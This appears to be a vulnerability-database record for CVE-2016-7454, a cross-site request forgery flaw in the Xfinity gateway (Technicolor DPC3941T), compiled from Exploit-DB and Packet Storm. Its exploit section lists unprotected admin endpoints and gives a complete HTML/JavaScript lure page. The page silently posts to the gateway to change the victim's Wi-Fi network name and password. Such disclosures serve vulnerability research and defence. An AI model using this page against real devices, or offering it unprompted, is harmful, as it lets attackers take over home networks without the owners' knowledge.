ID

VAR-E-201608-0575


CVE

cve_id:CVE-2016-7454

Trust: 1.5

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982

EDB ID

40982


TITLE

Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40982

DESCRIPTION

Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery. CVE-2016-7454 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 40982

AFFECTED PRODUCTS

vendor:xfinitymodel:gatewayscope: - version: -

Trust: 1.6

vendor:xfinitymodel:gateway technicolor dpc3941tscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982 // EDBNET: 89830

EXPLOIT

# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T
# Date: 09/08/2016
# Exploit Author: Ayushman Dutta
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454

The Device DPC3941T is vulnerable to CSRF and has no security on the entire
admin panel for it.
Some of the links are at:

<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php

A simple HTML page with javascript on which the attacker lures the victim
can be used to change state in the application.

<html>
<head>
<title>
Lets CSRF Xfinity to change Wifi Password
</title>
</head>
<script>
function jsonreq() {
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
"network_name":"MyName", "wireless_mode":"a,n,ac",
"security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true",
"channel_number":"40", "network_password":"password",
"broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"});
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.open("POST","
http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
true);
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
xmlhttp.send(json_upload);
}
jsonreq();
</script>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 40982

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 40982

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40982

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 40982 // EDBNET: 89830

TAGS

tag:exploit

Trust: 0.5

tag:proof of concept

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 140121

CREDITS

Ayushman Dutta

Trust: 0.6

sources: EXPLOIT-DB: 40982

EXTERNAL IDS

db:EXPLOIT-DBid:40982

Trust: 1.6

db:NVDid:CVE-2016-7454

Trust: 1.5

db:EDBNETid:89830

Trust: 0.6

db:PACKETSTORMid:140121

Trust: 0.5

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982 // EDBNET: 89830

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2016-7454

Trust: 1.5

url:https://www.exploit-db.com/exploits/40982/

Trust: 0.6

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982 // EDBNET: 89830

SOURCES

db:PACKETSTORMid:140121
db:EXPLOIT-DBid:40982
db:EDBNETid:89830

LAST UPDATE DATE

2022-07-27T09:29:51.895000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:140121date:2016-12-12T10:11:11
db:EXPLOIT-DBid:40982date:2016-08-09T00:00:00
db:EDBNETid:89830date:2017-01-01T00:00:00